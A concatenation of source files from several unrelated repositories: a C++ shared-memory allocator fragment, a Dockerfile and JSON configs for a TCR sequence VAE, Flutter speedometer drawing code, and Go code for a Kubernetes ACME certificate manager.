return nullptr;
}
}
assert(new_alloc_index != alloc_index_);
validate_index(new_alloc_index);
heap_()[alloc_index_] = payload_size;
alloc_index_ = new_alloc_index;
auto heap_ptr = reinterpret_cast<void *>(heap_() + payload_index);
return align_address(heap_ptr, alignment);
}
bool Allocator::free(const uint8_t *ptr) {
if (ptr == nullptr) {
return true;
}
auto *heap = reinterpret_cast<uint8_t *>(heap_());
Scope<concurrent::EXCLUSIVE> _(&lock_);
assert(ptr >= heap);
assert(ptr < heap + size_);
validate_index(free_index_);
uint32_t payload_size = heap_()[free_index_];
uint32_t payload_index = suggest_index(free_index_, payload_size);
if (ptr != reinterpret_cast<uint8_t *>(heap_() + payload_index)) {
return false;
}
uint32_t new_free_index = payload_index + payload_size;
if (new_free_index == size_ / sizeof(int)) {
new_free_index = 0;
}
free_index_ = new_free_index;
return true;
}
void Allocator::reset() {
alloc_index_ = 0;
free_index_ = 0;
}
void Allocator::lock_reset() { lock_.reset(); }
} // namespace shm::memory
#endif // INCLUDE_SHADESMAR_MEMORY_ALLOCATOR_H_
| Watch-Later/shadesmar |
<|start_filename|>Dockerfile<|end_filename|>
FROM continuumio/anaconda3:2019.07
RUN /opt/conda/bin/conda update -y conda
RUN mkdir /vampire
COPY Dockerfile /vampire/
COPY install/ /vampire/install/
WORKDIR /vampire
# Install conda dependencies.
RUN /opt/conda/bin/conda env create -f install/environment.yml
RUN /opt/conda/bin/conda env update -n vampire -f install/environment-R.yml
RUN /opt/conda/bin/conda env create -f install/environment-olga.yml
# Install R dependencies.
RUN /opt/conda/bin/conda run -n vampire ./install/install_R_packages.sh
RUN /opt/conda/bin/conda run -n vampire R --vanilla --slave -e 'install.packages("BiocManager",repos = "http://cran.us.r-project.org"); BiocManager::install("Biostrings")'
<|start_filename|>vampire/demo/model_params.json<|end_filename|>
{
"comment": "This is how models and their training parameters are specified. See tcr_vae.py for reference. Note that the training parameters are quite insufficient for training a real model.",
"model": "basic",
"latent_dim": 20,
"dense_nodes": 75,
"aa_embedding_dim": 21,
"v_gene_embedding_dim": 30,
"j_gene_embedding_dim": 13,
"beta": 0.75,
"max_cdr3_len": 30,
"n_aas": 21,
"n_v_genes": 59,
"n_j_genes": 13,
"stopping_monitor": "val_loss",
"batch_size": 100,
"pretrains": 2,
"warmup_period": 3,
"epochs": 10,
"patience": 20
}
<|start_filename|>vampire/pipe_main/sample_data/sample.json<|end_filename|>
{
"comment": "Just for the purposes of this sample JSON run specification file, the test path overlaps with the train path. Of course, don't do this for a real analysis.",
"test_paths" : [
"sample_data/02-0249_TCRB.4000.tsv.bz2"
],
"train_tsv_path" : "sample_data/02-0249_TCRB.4000.tsv.bz2",
"train_size" : 1000,
"nseqs" : 100
}
| kmayerb/vampire |
<|start_filename|>test/flutter_speedometer_test.dart<|end_filename|>
import 'package:flutter_test/flutter_test.dart';
import 'package:flutter_speedometer/flutter_speedometer.dart';
void main() {
test('adds one to input values', () {
final speedometer = Speedometer();
});
}
<|start_filename|>lib/src/painter.dart<|end_filename|>
import 'dart:math' as math;
import 'package:flutter/material.dart';
class ArcPainter extends CustomPainter {
ArcPainter(
{this.startAngle = 0, this.sweepAngle = 0, this.color = Colors.white});
final double startAngle;
final double sweepAngle;
final Color color;
@override
void paint(Canvas canvas, Size size) {
final rect = Rect.fromLTRB(size.width * 0.05, size.width * 0.05,
size.width * 0.95, size.height * 0.95);
final startAngle = math.pi / 12 * this.startAngle;
final sweepAngle = math.pi / 12 * this.sweepAngle;
final useCenter = false;
final paint = Paint()
..color = this.color
..style = PaintingStyle.stroke
..strokeWidth = size.width * 0.1;
canvas.drawArc(rect, startAngle, sweepAngle, useCenter, paint);
}
@override
bool shouldRepaint(CustomPainter old) {
return false;
}
}
class TriangleClipper extends CustomClipper<Path> {
@override
Path getClip(Size size) {
final path = Path();
path.moveTo(size.width * 0.5, 0.0);
path.lineTo(size.width, size.height);
path.lineTo(0.0, size.height);
path.close();
return path;
}
@override
bool shouldReclip(TriangleClipper oldClipper) => false;
}
class KimClipper extends CustomClipper<Path> {
@override
Path getClip(Size size) {
final path = Path();
path.moveTo(size.width * 0.5, size.width * 0.5);
path.lineTo(size.width * 0.5 + size.width / 30, size.height * 0.5);
path.lineTo(size.width * 0.5 + 1, size.height - size.width / 30);
path.lineTo(size.width * 0.5 - 1, size.height - size.width / 30);
path.lineTo(size.width * 0.5 - size.width / 30, size.height * 0.5);
path.close();
return path;
}
@override
bool shouldReclip(KimClipper oldClipper) => false;
}
| lhamycodes/Flutter-Speedometer |
<|start_filename|>processor.go<|end_filename|>
// Copyright 2016 Google Inc. All Rights Reserved.
// Copyright 2016 Palm Stone Games, Inc. All Rights Reserved.
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"crypto/rand"
"crypto/rsa"
"crypto/x509"
"encoding/json"
"encoding/pem"
"fmt"
"log"
"sort"
"strings"
"sync"
"time"
"github.com/boltdb/bolt"
"github.com/pkg/errors"
"github.com/xenolf/lego/acme"
"github.com/xenolf/lego/providers/dns/azure"
"github.com/xenolf/lego/providers/dns/cloudflare"
"github.com/xenolf/lego/providers/dns/cloudxns"
"github.com/xenolf/lego/providers/dns/digitalocean"
"github.com/xenolf/lego/providers/dns/dnsimple"
"github.com/xenolf/lego/providers/dns/dnsmadeeasy"
"github.com/xenolf/lego/providers/dns/dnspod"
"github.com/xenolf/lego/providers/dns/dyn"
"github.com/xenolf/lego/providers/dns/gandi"
"github.com/xenolf/lego/providers/dns/gandiv5"
"github.com/xenolf/lego/providers/dns/googlecloud"
"github.com/xenolf/lego/providers/dns/linode"
"github.com/xenolf/lego/providers/dns/namecheap"
"github.com/xenolf/lego/providers/dns/ovh"
"github.com/xenolf/lego/providers/dns/pdns"
"github.com/xenolf/lego/providers/dns/rfc2136"
"github.com/xenolf/lego/providers/dns/route53"
"github.com/xenolf/lego/providers/dns/vultr"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/pkg/api"
"k8s.io/client-go/pkg/api/unversioned"
"k8s.io/client-go/pkg/api/v1"
"k8s.io/client-go/pkg/apis/extensions/v1beta1"
"k8s.io/client-go/pkg/labels"
"k8s.io/client-go/pkg/selection"
"k8s.io/client-go/rest"
)
// CertProcessor holds the shared configuration, state, and locks
type CertProcessor struct {
acmeURL string
certSecretPrefix string
certNamespace string
tagPrefix string
namespaces []string
class string
defaultProvider string
defaultEmail string
db *bolt.DB
Lock sync.Mutex
HTTPLock sync.Mutex
TLSLock sync.Mutex
k8s K8sClient
renewBeforeDays int
}
// NewCertProcessor creates and populates a CertProcessor
func NewCertProcessor(
k8s *kubernetes.Clientset,
certClient *rest.RESTClient,
acmeURL string,
certSecretPrefix string,
certNamespace string,
tagPrefix string,
namespaces []string,
class string,
defaultProvider string,
defaultEmail string,
db *bolt.DB,
renewBeforeDays int) *CertProcessor {
return &CertProcessor{
k8s: K8sClient{c: k8s, certClient: certClient},
acmeURL: acmeURL,
certSecretPrefix: certSecretPrefix,
certNamespace: certNamespace,
tagPrefix: tagPrefix,
namespaces: namespaces,
class: class,
defaultProvider: defaultProvider,
defaultEmail: defaultEmail,
db: db,
renewBeforeDays: renewBeforeDays,
}
}
func (p *CertProcessor) newACMEClient(acmeUser acme.User, provider string) (*acme.Client, *sync.Mutex, error) {
acmeClient, err := acme.NewClient(p.acmeURL, acmeUser, acme.RSA2048)
if err != nil {
return nil, nil, errors.Wrap(err, "Error while generating acme client")
}
initDNSProvider := func(p acme.ChallengeProvider, err error) (*acme.Client, *sync.Mutex, error) {
if err != nil {
return nil, nil, errors.Wrapf(err, "Error while initializing challenge provider %v", provider)
}
if err := acmeClient.SetChallengeProvider(acme.DNS01, p); err != nil {
return nil, nil, errors.Wrapf(err, "Error while setting challenge provider %v for dns-01", provider)
}
acmeClient.ExcludeChallenges([]acme.Challenge{acme.HTTP01, acme.TLSSNI01})
return acmeClient, nil, nil
}
switch provider {
case "http":
acmeClient.SetHTTPAddress(":8080")
acmeClient.ExcludeChallenges([]acme.Challenge{acme.DNS01, acme.TLSSNI01})
return acmeClient, &p.HTTPLock, nil
case "tls":
acmeClient.SetTLSAddress(":8081")
acmeClient.ExcludeChallenges([]acme.Challenge{acme.HTTP01, acme.DNS01})
return acmeClient, &p.TLSLock, nil
case "azure":
return initDNSProvider(azure.NewDNSProvider())
case "cloudflare":
return initDNSProvider(cloudflare.NewDNSProvider())
case "cloudxns":
return initDNSProvider(cloudxns.NewDNSProvider())
case "digitalocean":
return initDNSProvider(digitalocean.NewDNSProvider())
case "dnsimple":
return initDNSProvider(dnsimple.NewDNSProvider())
case "dnsmadeeasy":
return initDNSProvider(dnsmadeeasy.NewDNSProvider())
case "dnspod":
return initDNSProvider(dnspod.NewDNSProvider())
case "dyn":
return initDNSProvider(dyn.NewDNSProvider())
case "gandi":
return initDNSProvider(gandi.NewDNSProvider())
case "gandiv5":
return initDNSProvider(gandiv5.NewDNSProvider())
case "googlecloud":
return initDNSProvider(googlecloud.NewDNSProvider())
case "linode":
return initDNSProvider(linode.NewDNSProvider())
case "namecheap":
return initDNSProvider(namecheap.NewDNSProvider())
case "ovh":
return initDNSProvider(ovh.NewDNSProvider())
case "pdns":
return initDNSProvider(pdns.NewDNSProvider())
case "rfc2136":
return initDNSProvider(rfc2136.NewDNSProvider())
case "route53":
return initDNSProvider(route53.NewDNSProvider())
case "vultr":
return initDNSProvider(vultr.NewDNSProvider())
default:
return nil, nil, errors.Errorf("Unknown provider %v", provider)
}
}
func (p *CertProcessor) syncCertificates() error {
p.Lock.Lock()
defer p.Lock.Unlock()
certificates, err := p.getCertificates()
if err != nil {
return err
}
var wg sync.WaitGroup
for _, cert := range certificates {
wg.Add(1)
go func(cert Certificate) {
defer wg.Done()
_, err := p.processCertificate(cert)
if err != nil {
log.Printf("Error while processing certificate during sync: %v", err)
}
}(cert)
}
wg.Wait()
return nil
}
func (p *CertProcessor) getSecrets() ([]v1.Secret, error) {
var secrets []v1.Secret
if len(p.namespaces) == 0 {
var err error
secrets, err = p.k8s.getSecrets(v1.NamespaceAll, p.getLabelSelector())
if err != nil {
return nil, errors.Wrap(err, "Error while fetching secret list")
}
} else {
for _, namespace := range p.namespaces {
s, err := p.k8s.getSecrets(namespace, p.getLabelSelector())
if err != nil {
return nil, errors.Wrap(err, "Error while fetching secret list")
}
secrets = append(secrets, s...)
}
}
return secrets, nil
}
func (p *CertProcessor) getCertificates() ([]Certificate, error) {
var certificates []Certificate
if len(p.namespaces) == 0 {
var err error
certificates, err = p.k8s.getCertificates(v1.NamespaceAll, p.getLabelSelector())
if err != nil {
return nil, errors.Wrap(err, "Error while fetching certificate list")
}
} else {
for _, namespace := range p.namespaces {
certs, err := p.k8s.getCertificates(namespace, p.getLabelSelector())
if err != nil {
return nil, errors.Wrap(err, "Error while fetching certificate list")
}
certificates = append(certificates, certs...)
}
}
return certificates, nil
}
func (p *CertProcessor) getIngresses() ([]v1beta1.Ingress, error) {
var ingresses []v1beta1.Ingress
if len(p.namespaces) == 0 {
var err error
if err != nil {
return nil, errors.Wrap(err, "Error creating API URL for ingress list")
}
ingresses, err = p.k8s.getIngresses(v1.NamespaceAll, p.getLabelSelector())
if err != nil {
return nil, errors.Wrap(err, "Error while fetching ingress list")
}
} else {
for _, namespace := range p.namespaces {
igs, err := p.k8s.getIngresses(namespace, p.getLabelSelector())
if err != nil {
return nil, errors.Wrap(err, "Error while fetching ingress list")
}
ingresses = append(ingresses, igs...)
}
}
return ingresses, nil
}
func (p *CertProcessor) syncIngresses() error {
p.Lock.Lock()
defer p.Lock.Unlock()
ingresses, err := p.getIngresses()
if err != nil {
return err
}
var wg sync.WaitGroup
for _, ingress := range ingresses {
wg.Add(1)
go func(ingress v1beta1.Ingress) {
p.processIngress(ingress)
wg.Done()
}(ingress)
}
wg.Wait()
return nil
}
func (p *CertProcessor) watchKubernetesEvents(namespace string, selector labels.Selector, wg *sync.WaitGroup, doneChan <-chan struct{}) {
if namespace == v1.NamespaceAll {
log.Printf("Watching certificates and ingresses in all namespaces")
} else {
log.Printf("Watchining certificates and ingresses in namespace %s", namespace)
}
certEvents := p.k8s.monitorCertificateEvents(namespace, selector, doneChan)
ingressEvents := p.k8s.monitorIngressEvents(namespace, selector, doneChan)
for {
select {
case event := <-certEvents:
err := p.processCertificateEvent(event)
if err != nil {
log.Printf("Error while processing certificate event: %v", err)
}
case event := <-ingressEvents:
p.processIngressEvent(event)
case <-doneChan:
wg.Done()
log.Println("Stopped certificate event watcher.")
return
}
}
}
func (p *CertProcessor) maintenance(syncInterval time.Duration, wg *sync.WaitGroup, doneChan <-chan struct{}) {
for {
select {
case <-time.After(syncInterval):
if err := p.syncCertificates(); err != nil {
log.Printf("Error while synchronizing certificates during refresh: %s", err)
}
if err := p.syncIngresses(); err != nil {
log.Printf("Error while synchronizing ingresses during refresh: %s", err)
}
if err := p.gcSecrets(); err != nil {
log.Printf("Error cleaning up secrets: %s", err)
}
case <-doneChan:
wg.Done()
log.Println("Stopped refresh loop.")
return
}
}
}
func (p *CertProcessor) processCertificateEvent(c CertificateEvent) error {
p.Lock.Lock()
defer p.Lock.Unlock()
switch c.Type {
case "ADDED", "MODIFIED":
_, err := p.processCertificate(c.Object)
return err
}
return nil
}
func (p *CertProcessor) secretName(cert Certificate) string {
if cert.Spec.SecretName != "" {
return cert.Spec.SecretName
}
return p.certSecretPrefix + cert.Spec.Domain
}
// normalizeHostnames returns a copy of the hostnames array where all hostnames are lower
// cased and the array sorted.
// This allows the input to have changed order or different casing between runs,
// but a new certificate will only be created if a certificate is added or removed.
func normalizeHostnames(hostnames []string) []string {
arr := make([]string, len(hostnames))
copy(arr, hostnames)
for i, hostname := range arr {
arr[i] = strings.ToLower(hostname)
}
sort.Strings(arr)
return arr
}
func (p *CertProcessor) getStoredAltNames(cert Certificate) ([]string, error) {
var altNamesRaw []byte
err := p.db.View(func(tx *bolt.Tx) error {
altNamesRaw = tx.Bucket([]byte("domain-altnames")).Get([]byte(cert.Spec.Domain))
return nil
})
if err != nil {
return nil, errors.Wrapf(err, "Error while fetching altnames from database for domain %v", cert.Spec.Domain)
}
if altNamesRaw == nil {
return nil, nil
}
var altNames []string
err = json.Unmarshal(altNamesRaw, &altNames)
if err != nil {
return nil, errors.Wrapf(err, "Error while unmarshalling altnames from database for domain %v", cert.Spec.Domain)
}
return altNames, nil
}
func equalAltNames(a, b []string) bool {
if len(a) != len(b) {
return false
}
for i := range a {
if a[i] != b[i] {
return false
}
}
return true
}
// processCertificate creates or renews the corresponding secret
// processCertificate will create new ACME users if necessary, and complete ACME challenges
// processCertificate caches ACME user and certificate information in boltdb for reuse
func (p *CertProcessor) processCertificate(cert Certificate) (processed bool, err error) {
var (
acmeUserInfo ACMEUserData
acmeCertDetails ACMECertDetails
acmeCert ACMECertData
acmeClient *acme.Client
acmeClientMutex *sync.Mutex
)
namespace := certificateNamespace(cert)
// Fetch current certificate data from k8s
s, err := p.k8s.getSecret(namespace, p.secretName(cert))
if err != nil {
return false, errors.Wrapf(err, "Error while fetching certificate acme data for domain %v", cert.Spec.Domain)
}
altNames := normalizeHostnames(cert.Spec.AltNames)
storedAltNames, err := p.getStoredAltNames(cert)
if err != nil {
return false, errors.Wrap(err, "Error while getting stored alternative names")
}
sameAltNames := equalAltNames(altNames, storedAltNames)
// If a cert exists, and altNames are correct check its expiry and expected altNames
if s != nil && getDomainFromLabel(s, p.tagPrefix) == cert.Spec.Domain && sameAltNames {
acmeCert, err = NewACMECertDataFromSecret(s, p.tagPrefix)
if err != nil {
return false, errors.Wrapf(err, "Error while decoding acme certificate from secret for existing domain %v", cert.Spec.Domain)
}
// Decode cert
pemBlock, _ := pem.Decode(acmeCert.Cert)
if pemBlock == nil {
return false, errors.Wrapf(err, "Got nil back when decoding x509 encoded certificate for existing domain %v", cert.Spec.Domain)
}
parsedCert, err := x509.ParseCertificate(pemBlock.Bytes)
if err != nil {
return false, errors.Wrapf(err, "Error while parsing x509 encoded certificate for existing domain %v", cert.Spec.Domain)
}
// If certificate expires after now + p.renewBeforeDays, don't renew
if parsedCert.NotAfter.After(time.Now().Add(time.Hour * time.Duration(24*p.renewBeforeDays))) {
return false, nil
}
log.Printf("[%v] Expiry for cert is in less than %v days (%v), attempting renewal", cert.Spec.Domain, p.renewBeforeDays, parsedCert.NotAfter.String())
}
// Fetch acme user data and cert details from bolt
var userInfoRaw, certDetailsRaw []byte
err = p.db.View(func(tx *bolt.Tx) error {
userInfoRaw = tx.Bucket([]byte("user-info")).Get([]byte(cert.Spec.Domain))
certDetailsRaw = tx.Bucket([]byte("cert-details")).Get([]byte(cert.Spec.Domain))
return nil
})
if err != nil {
return false, errors.Wrapf(err, "Error while running bolt view transaction for domain %v", cert.Spec.Domain)
}
provider := valueOrDefault(cert.Spec.Provider, p.defaultProvider)
email := valueOrDefault(cert.Spec.Email, p.defaultEmail)
// Handle user information
if userInfoRaw != nil { // Use existing user
if err := json.Unmarshal(userInfoRaw, &acmeUserInfo); err != nil {
return false, errors.Wrapf(err, "Error while unmarshalling user info for %v", cert.Spec.Domain)
}
log.Printf("Creating ACME client for %v provider for %v", provider, cert.Spec.Domain)
acmeClient, acmeClientMutex, err = p.newACMEClient(&acmeUserInfo, provider)
if err != nil {
return false, errors.Wrapf(err, "Error while creating ACME client for %v provider for %v", provider, cert.Spec.Domain)
}
// Some acme providers require locking, if the mutex is specified, lock it
if acmeClientMutex != nil {
acmeClientMutex.Lock()
defer acmeClientMutex.Unlock()
}
} else { // Generate a new ACME user
userKey, err := rsa.GenerateKey(rand.Reader, 2048)
if err != nil {
return false, errors.Wrapf(err, "Error while generating rsa key for new user for domain %v", cert.Spec.Domain)
}
acmeUserInfo.Email = email
acmeUserInfo.Key = pem.EncodeToMemory(&pem.Block{
Type: "RSA PRIVATE KEY",
Bytes: x509.MarshalPKCS1PrivateKey(userKey),
})
log.Printf("Creating ACME client for %v provider for %v", provider, cert.Spec.Domain)
acmeClient, acmeClientMutex, err = p.newACMEClient(&acmeUserInfo, provider)
if err != nil {
return false, errors.Wrapf(err, "Error while creating ACME client for %v", cert.Spec.Domain)
}
// Some acme providers require locking, if the mutex is specified, lock it
if acmeClientMutex != nil {
acmeClientMutex.Lock()
defer acmeClientMutex.Unlock()
}
// Register
acmeUserInfo.Registration, err = acmeClient.Register()
if err != nil {
return false, errors.Wrapf(err, "Error while registering user for new domain %v", cert.Spec.Domain)
}
// Agree to TOS
if err := acmeClient.AgreeToTOS(); err != nil {
return false, errors.Wrapf(err, "Error while agreeing to acme TOS for new domain %v", cert.Spec.Domain)
}
}
domains := append([]string{cert.Spec.Domain}, altNames...)
// If we have cert details stored with expected altNames, do a renewal, otherwise, obtain from scratch
if certDetailsRaw == nil || acmeCert.DomainName == "" || !sameAltNames {
acmeCert.DomainName = cert.Spec.Domain
// Obtain a cert
certRes, errs := acmeClient.ObtainCertificate(domains, true, nil, false)
for _, domain := range domains {
if errs[domain] != nil {
return false, errors.Wrapf(errs[domain], "Error while obtaining certificate for new domain %v", domain)
}
}
// fill in data
acmeCert.Cert = certRes.Certificate
acmeCert.PrivateKey = certRes.PrivateKey
acmeCertDetails = NewACMECertDetailsFromResource(certRes)
} else {
if err := json.Unmarshal(certDetailsRaw, &acmeCertDetails); err != nil {
return false, errors.Wrapf(err, "Error while unmarshalling cert details for existing domain %v", cert.Spec.Domain)
}
// Fill in cert resource
certRes := acmeCertDetails.ToCertResource()
certRes.Certificate = acmeCert.Cert
certRes.PrivateKey = acmeCert.PrivateKey
certRes, err = acmeClient.RenewCertificate(certRes, true, false)
if err != nil {
return false, errors.Wrapf(err, "Error while renewing certificate for existing domain %v", cert.Spec.Domain)
}
// Fill in details
acmeCert.Cert = certRes.Certificate
acmeCert.PrivateKey = certRes.PrivateKey
acmeCertDetails = NewACMECertDetailsFromResource(certRes)
}
// Serialize acmeCertDetails and acmeUserInfo
certDetailsRaw, err = json.Marshal(&acmeCertDetails)
if err != nil {
return false, errors.Wrapf(err, "Error while marshalling cert details for domain %v", cert.Spec.Domain)
}
userInfoRaw, err = json.Marshal(&acmeUserInfo)
if err != nil {
return false, errors.Wrapf(err, "Error while marshalling user info for domain %v", cert.Spec.Domain)
}
altNamesRaw, err := json.Marshal(altNames)
if err != nil {
return false, errors.Wrapf(err, "Error while marshalling altNames for domain %v", cert.Spec.Domain)
}
// Save cert details and user info to bolt
err = p.db.Update(func(tx *bolt.Tx) error {
key := []byte(cert.Spec.Domain)
tx.Bucket([]byte("user-info")).Put(key, userInfoRaw)
tx.Bucket([]byte("cert-details")).Put(key, certDetailsRaw)
tx.Bucket([]byte("domain-altnames")).Put(key, altNamesRaw)
return nil
})
if err != nil {
return false, errors.Wrapf(err, "Error while saving data to bolt for domain %v", cert.Spec.Domain)
}
// Convert cert data to k8s secret
isUpdate := s != nil
s = acmeCert.ToSecret(p.tagPrefix, p.class)
s.Name = p.secretName(cert)
if isUpdate {
log.Printf("Updating secret %v in namespace %v for domain %v", s.Name, namespace, cert.Spec.Domain)
} else {
log.Printf("Creating secret %v in namespace %v for domain %v", s.Name, namespace, cert.Spec.Domain)
}
// Save the k8s secret
if err := p.k8s.saveSecret(namespace, s, isUpdate); err != nil {
return false, errors.Wrapf(err, "Error while saving secret for domain %v", cert.Spec.Domain)
}
msg := "Created certificate"
if isUpdate {
msg = "Updated certificate"
}
p.k8s.createEvent(v1.Event{
ObjectMeta: v1.ObjectMeta{
Namespace: namespace,
},
InvolvedObject: v1.ObjectReference{
Kind: "Secret",
Namespace: namespace,
Name: s.Name,
},
Reason: "ACMEUpdated",
Message: msg,
Source: v1.EventSource{
Component: "kube-cert-manager",
},
Type: "Normal",
})
return true, nil
}
func (p *CertProcessor) gcSecrets() error {
p.Lock.Lock()
defer p.Lock.Unlock()
// Fetch secrets before certificates. That way, if a race occurs,
// we will only fail to delete a secret, not accidentally delete
// one that's still referenced.
secrets, err := p.getSecrets()
if err != nil {
return err
}
certs, err := p.getCertificates()
if err != nil {
return err
}
ingresses, err := p.getIngresses()
if err != nil {
return err
}
for _, ingress := range ingresses {
certs = append(certs, ingressCertificates(p, ingress)...)
}
usedSecrets := map[string]bool{}
for _, cert := range certs {
usedSecrets[cert.Metadata.Namespace+" "+p.secretName(cert)] = true
}
for _, secret := range secrets {
// Only check for the deprecated "enabled" annotation if not using the "class" feature
if p.class == "" && secret.Annotations[addTagPrefix(p.tagPrefix, "enabled")] != "true" {
continue
}
if usedSecrets[secret.Namespace+" "+secret.Name] {
continue
}
log.Printf("Deleting unused secret %s in namespace %s", secret.Name, secret.Namespace)
if err := p.k8s.deleteSecret(secret.Namespace, secret.Name); err != nil {
return err
}
}
return nil
}
func (p *CertProcessor) processIngressEvent(c IngressEvent) {
p.Lock.Lock()
defer p.Lock.Unlock()
switch c.Type {
case "ADDED", "MODIFIED":
p.processIngress(c.Object)
}
}
func ingressCertificates(p *CertProcessor, ingress v1beta1.Ingress) []Certificate {
// The enabled annotation is deprecated when a class label is used
if p.class == "" && ingress.Annotations[addTagPrefix(p.tagPrefix, "enabled")] != "true" {
return nil
}
var certs []Certificate
provider := valueOrDefault(ingress.Annotations[addTagPrefix(p.tagPrefix, "provider")], p.defaultProvider)
email := valueOrDefault(ingress.Annotations[addTagPrefix(p.tagPrefix, "email")], p.defaultEmail)
if provider == "" || email == "" {
return nil
}
for _, tls := range ingress.Spec.TLS {
if len(tls.Hosts) < 1 {
continue
}
cert := Certificate{
TypeMeta: unversioned.TypeMeta{
APIVersion: "v1",
Kind: "Certificate",
},
Metadata: api.ObjectMeta{
Namespace: ingress.Namespace,
},
Spec: CertificateSpec{
Domain: tls.Hosts[0],
Provider: provider,
Email: email,
SecretName: tls.SecretName,
AltNames: tls.Hosts[1:],
},
}
certs = append(certs, cert)
}
return certs
}
func (p *CertProcessor) processIngress(ingress v1beta1.Ingress) {
if p.class == "" && ingress.Annotations[addTagPrefix(p.tagPrefix, "enabled")] != "true" {
return
}
source := v1.EventSource{
Component: "kube-cert-manager",
}
var certs []Certificate
provider := valueOrDefault(ingress.Annotations[addTagPrefix(p.tagPrefix, "provider")], p.defaultProvider)
email := valueOrDefault(ingress.Annotations[addTagPrefix(p.tagPrefix, "email")], p.defaultEmail)
for _, tls := range ingress.Spec.TLS {
if len(tls.Hosts) == 0 {
continue
}
altNames := tls.Hosts[1:]
cert := Certificate{
TypeMeta: unversioned.TypeMeta{
APIVersion: "v1",
Kind: "Certificate",
},
Metadata: api.ObjectMeta{
Namespace: ingress.Namespace,
},
Spec: CertificateSpec{
Domain: tls.Hosts[0],
Provider: provider,
Email: email,
SecretName: tls.SecretName,
AltNames: altNames,
},
}
certs = append(certs, cert)
}
if len(certs) > 0 && (provider == "" || email == "") {
p.k8s.createEvent(v1.Event{
ObjectMeta: v1.ObjectMeta{
Namespace: ingress.Namespace,
},
InvolvedObject: ingressReference(ingress, ""),
Reason: "ACMEMissingAnnotation",
Message: "Couldn't create certificates: missing email or provider annotation",
Source: source,
Type: "Warning",
})
return
}
for _, cert := range certs {
processed, err := p.processCertificate(cert)
if err != nil {
p.k8s.createEvent(v1.Event{
ObjectMeta: v1.ObjectMeta{
Namespace: ingress.Namespace,
},
InvolvedObject: ingressReference(ingress, ""),
Reason: "ACMEError",
Message: fmt.Sprintf("Couldn't create certificate for secret %s: %s", cert.Spec.SecretName, err),
Source: source,
Type: "Warning",
})
continue
}
if processed {
p.k8s.createEvent(v1.Event{
ObjectMeta: v1.ObjectMeta{
Namespace: ingress.Namespace,
},
InvolvedObject: ingressReference(ingress, ""),
Reason: "ACMEProcessed",
Message: fmt.Sprintf("Processed ACME certificate for secret: %s", cert.Spec.SecretName),
Source: source,
Type: "Normal",
})
}
}
}
func certificateNamespace(c Certificate) string {
if c.Metadata.Namespace != "" {
return c.Metadata.Namespace
}
return "default"
}
func (p *CertProcessor) getLabelSelector() labels.Selector {
if p.class != "" {
r, err := labels.NewRequirement(
addTagPrefix(p.tagPrefix, "class"),
selection.Equals,
[]string{p.class},
)
if err != nil {
log.Fatalf("unable to create class-equals requirement: %v", err)
}
return labels.NewSelector().Add(*r)
}
return nil
}
func addTagPrefix(prefix, tag string) string {
if prefix == "" {
return tag
} else if strings.HasSuffix(prefix, ".") {
// Support the deprecated "stable.k8s.psg.io/kcm." prefix
return prefix + tag
}
return prefix + "/" + tag
}
func valueOrDefault(a, b string) string {
if a != "" {
return a
}
return b
}
<|start_filename|>k8s.go<|end_filename|>
// Copyright 2016 Google Inc. All Rights Reserved.
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"crypto"
"crypto/x509"
"encoding/json"
"encoding/pem"
"fmt"
"log"
"net/http"
"net/url"
"github.com/pkg/errors"
"github.com/xenolf/lego/acme"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/pkg/api"
kerrors "k8s.io/client-go/pkg/api/errors"
"k8s.io/client-go/pkg/api/meta"
"k8s.io/client-go/pkg/api/unversioned"
"k8s.io/client-go/pkg/api/v1"
"k8s.io/client-go/pkg/apis/extensions/v1beta1"
"k8s.io/client-go/pkg/labels"
"k8s.io/client-go/pkg/runtime"
"k8s.io/client-go/pkg/util/flowcontrol"
"k8s.io/client-go/pkg/watch"
"k8s.io/client-go/rest"
"k8s.io/client-go/tools/cache"
)
// K8sClient provides convenience functions for handling resources this project
// cares about
// TODO: merge the two clients
type K8sClient struct {
c *kubernetes.Clientset
certClient *rest.RESTClient
}
type WatchEvent struct {
Type string `json:"type"`
Object json.RawMessage `json:"object"`
}
type CertificateEvent struct {
Type string `json:"type"`
Object Certificate `json:"object"`
}
type Certificate struct {
unversioned.TypeMeta `json:",inline"`
Metadata api.ObjectMeta `json:"metadata"`
Spec CertificateSpec `json:"spec"`
}
func (c *Certificate) GetObjectKind() unversioned.ObjectKind {
return &c.TypeMeta
}
func (c *Certificate) GetObjectMeta() meta.Object {
return &c.Metadata
}
type CertificateCopy Certificate
// Temporary workaround for https://github.com/kubernetes/client-go/issues/8
func (c *Certificate) UnmarshalJSON(data []byte) error {
tmp := CertificateCopy{}
err := json.Unmarshal(data, &tmp)
if err != nil {
return err
}
tmp2 := Certificate(tmp)
*c = tmp2
return nil
}
type CertificateList struct {
unversioned.TypeMeta `json:",inline"`
Metadata unversioned.ListMeta `json:"metadata"`
Items []Certificate `json:"items"`
}
func (c *CertificateList) GetObjectKind() unversioned.ObjectKind {
return &c.TypeMeta
}
func (c *CertificateList) GetListMeta() unversioned.List {
return &c.Metadata
}
type CertificateListCopy CertificateList
// Temporary workaround for https://github.com/kubernetes/client-go/issues/8
func (cl *CertificateList) UnmarshalJSON(data []byte) error {
tmp := CertificateListCopy{}
err := json.Unmarshal(data, &tmp)
if err != nil {
return err
}
tmp2 := CertificateList(tmp)
*cl = tmp2
return nil
}
type CertificateSpec struct {
Domain string `json:"domain"`
Provider string `json:"provider"`
Email string `json:"email"`
SecretName string `json:"secretName"`
AltNames []string `json:"altNames"`
}
type ACMECertData struct {
DomainName string
Cert []byte
PrivateKey []byte
}
type IngressEvent struct {
Type string `json:"type"`
Object v1beta1.Ingress `json:"object"`
}
